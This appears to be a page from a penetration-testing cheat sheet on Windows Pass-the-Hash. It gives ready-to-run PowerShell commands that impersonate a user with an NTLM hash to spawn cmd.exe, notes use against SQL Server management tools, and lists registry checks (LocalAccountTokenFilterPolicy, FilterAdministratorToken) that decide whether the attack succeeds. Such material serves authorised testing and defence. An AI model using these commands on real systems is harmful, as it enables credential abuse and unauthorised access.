Comment on page
Pass-the-Hash
Impersonate a user with Pass-the-Hash for local actions (network authentication does not work with
Impersonation Token, only with Delegation Token):PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose
PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe"
Can be used for authenticating in SQL Server management tools (
%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe) and accessing DBs with SQL admin hash, for example.Property Name | Property Path |
|---|---|
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ | |
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ |
If
LocalAccountTokenFilterPolicy exists and is set to 1 (doesn't exist by default), remote connections from all local admins are not affected by UAC and PtH will succeed:PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy
If
FilterAdministratorToken exists and is set to 1 (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail:PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name FilterAdministratorToken
Last modified 3mo ago